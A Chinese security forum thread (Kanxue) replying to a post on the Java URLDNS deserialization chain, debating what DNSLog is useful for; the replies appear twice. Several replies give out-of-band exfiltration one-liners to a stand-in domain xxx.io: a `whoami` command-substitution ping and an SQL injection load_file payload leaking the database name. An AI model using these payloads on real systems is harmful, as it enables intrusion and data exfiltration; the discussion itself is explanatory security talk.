[原创]URLDNS反序列化利用链-WEB安全-看雪-安全社区|安全招聘|kanxue.com

最新回复 (9)
guduzhe 雪币： 3988 活跃值： (5635) 能力值： ( LV2，RANK：10 ) 在线值：发帖 16 回帖 196 粉丝 29 关注私信	guduzhe 2 楼除了触发dns的查询请求，有其他什么危害么 2024-8-26 23:24 0
米龙·0xFFFE 雪币： 5510 活跃值： (870) 能力值： ( LV5，RANK：70 ) 在线值：发帖 10 回帖 20 粉丝 8 关注私信	米龙·0xFFFE 3 楼 guduzhe 除了触发dns的查询请求，有其他什么危害么 dnslog的作用是可以在域名前添加自定义前缀，这个前缀可以是命令执行结果，比如`whoami`.xxx.io，也可用于sql注入，比如select load_file(concat('\\\\',database(),'.xxx.io\\aax')) 2024-8-27 07:29 0
guduzhe 雪币： 3988 活跃值： (5635) 能力值： ( LV2，RANK：10 ) 在线值：发帖 16 回帖 196 粉丝 29 关注私信	guduzhe 4 楼米龙·0xFFFE dnslog的作用是可以在域名前添加自定义前缀，这个前缀可以是命令执行结果，比如`whoami`.xxx.io，也可用于sql注入，比如select load_file(concat('\\\\',d ... 你说的这个是sql注入，场景不一样 2024-8-27 08:10 0
米龙·0xFFFE 雪币： 5510 活跃值： (870) 能力值： ( LV5，RANK：70 ) 在线值：发帖 10 回帖 20 粉丝 8 关注私信	米龙·0xFFFE 5 楼 guduzhe 你说的这个是sql注入，场景不一样不一定非得sql注入，我意思是可以用于信息收集 2024-8-27 08:38 0
Met三二雪币： 86 活跃值： (2026) 能力值： ( LV3，RANK：20 ) 在线值：发帖 11 回帖 37 粉丝 5 关注私信	Met三二 6 楼米龙·0xFFFE 不一定非得sql注入，我意思是可以用于信息收集这就是探测用的...你这看来还没学会啊。。就开始瞎说了 2024-8-27 11:27 0
米龙·0xFFFE 雪币： 5510 活跃值： (870) 能力值： ( LV5，RANK：70 ) 在线值：发帖 10 回帖 20 粉丝 8 关注私信	米龙·0xFFFE 7 楼 Met三二这就是探测用的...你这看来还没学会啊。。就开始瞎说了具体要探测什么，麻烦说详细些 2024-8-27 12:24 0
米龙·0xFFFE 雪币： 5510 活跃值： (870) 能力值： ( LV5，RANK：70 ) 在线值：发帖 10 回帖 20 粉丝 8 关注私信	米龙·0xFFFE 8 楼单说这个利用链，纯粹就是为了验证目标是否存在反序列化漏洞。DNSLog还有其它作用，比如我说的sql注入，或者ping `whoami`.xxx.io可以得到系统用户名。 2024-8-27 13:06 0
Met三二雪币： 86 活跃值： (2026) 能力值： ( LV3，RANK：20 ) 在线值：发帖 11 回帖 37 粉丝 5 关注私信	Met三二 9 楼米龙·0xFFFE 具体要探测什么，麻烦说详细些最后于 2024-8-27 14:42 被Met三二编辑，原因： 2024-8-27 14:31 0
米龙·0xFFFE 雪币： 5510 活跃值： (870) 能力值： ( LV5，RANK：70 ) 在线值：发帖 10 回帖 20 粉丝 8 关注私信	米龙·0xFFFE 10 楼 Met三二探测反序列用的，而且urldns也和执行命令没有关系吧。`whoami`.xxx.io这和urldns链没关系啊。看来你应该是刚学java吧。。我也没说`whoami`.xxx.io是urldns链呀，我只说这是dnslog的一种利用方式，dnslog又不是只能用来探测反序列化漏洞 2024-8-27 14:38 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

最新回复 (9)
guduzhe 雪币： 3988 活跃值： (5635) 能力值： ( LV2，RANK：10 ) 在线值：发帖 16 回帖 196 粉丝 29 关注私信	guduzhe 2 楼除了触发dns的查询请求，有其他什么危害么 2024-8-26 23:24 0
米龙·0xFFFE 雪币： 5510 活跃值： (870) 能力值： ( LV5，RANK：70 ) 在线值：发帖 10 回帖 20 粉丝 8 关注私信	米龙·0xFFFE 3 楼 guduzhe 除了触发dns的查询请求，有其他什么危害么 dnslog的作用是可以在域名前添加自定义前缀，这个前缀可以是命令执行结果，比如`whoami`.xxx.io，也可用于sql注入，比如select load_file(concat('\\\\',database(),'.xxx.io\\aax')) 2024-8-27 07:29 0
guduzhe 雪币： 3988 活跃值： (5635) 能力值： ( LV2，RANK：10 ) 在线值：发帖 16 回帖 196 粉丝 29 关注私信	guduzhe 4 楼米龙·0xFFFE dnslog的作用是可以在域名前添加自定义前缀，这个前缀可以是命令执行结果，比如`whoami`.xxx.io，也可用于sql注入，比如select load_file(concat('\\\\',d ... 你说的这个是sql注入，场景不一样 2024-8-27 08:10 0
米龙·0xFFFE 雪币： 5510 活跃值： (870) 能力值： ( LV5，RANK：70 ) 在线值：发帖 10 回帖 20 粉丝 8 关注私信	米龙·0xFFFE 5 楼 guduzhe 你说的这个是sql注入，场景不一样不一定非得sql注入，我意思是可以用于信息收集 2024-8-27 08:38 0
Met三二雪币： 86 活跃值： (2026) 能力值： ( LV3，RANK：20 ) 在线值：发帖 11 回帖 37 粉丝 5 关注私信	Met三二 6 楼米龙·0xFFFE 不一定非得sql注入，我意思是可以用于信息收集这就是探测用的...你这看来还没学会啊。。就开始瞎说了 2024-8-27 11:27 0
米龙·0xFFFE 雪币： 5510 活跃值： (870) 能力值： ( LV5，RANK：70 ) 在线值：发帖 10 回帖 20 粉丝 8 关注私信	米龙·0xFFFE 7 楼 Met三二这就是探测用的...你这看来还没学会啊。。就开始瞎说了具体要探测什么，麻烦说详细些 2024-8-27 12:24 0
米龙·0xFFFE 雪币： 5510 活跃值： (870) 能力值： ( LV5，RANK：70 ) 在线值：发帖 10 回帖 20 粉丝 8 关注私信	米龙·0xFFFE 8 楼单说这个利用链，纯粹就是为了验证目标是否存在反序列化漏洞。DNSLog还有其它作用，比如我说的sql注入，或者ping `whoami`.xxx.io可以得到系统用户名。 2024-8-27 13:06 0
Met三二雪币： 86 活跃值： (2026) 能力值： ( LV3，RANK：20 ) 在线值：发帖 11 回帖 37 粉丝 5 关注私信	Met三二 9 楼米龙·0xFFFE 具体要探测什么，麻烦说详细些最后于 2024-8-27 14:42 被Met三二编辑，原因： 2024-8-27 14:31 0
米龙·0xFFFE 雪币： 5510 活跃值： (870) 能力值： ( LV5，RANK：70 ) 在线值：发帖 10 回帖 20 粉丝 8 关注私信	米龙·0xFFFE 10 楼 Met三二探测反序列用的，而且urldns也和执行命令没有关系吧。`whoami`.xxx.io这和urldns链没关系啊。看来你应该是刚学java吧。。我也没说`whoami`.xxx.io是urldns链呀，我只说这是dnslog的一种利用方式，dnslog又不是只能用来探测反序列化漏洞 2024-8-27 14:38 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复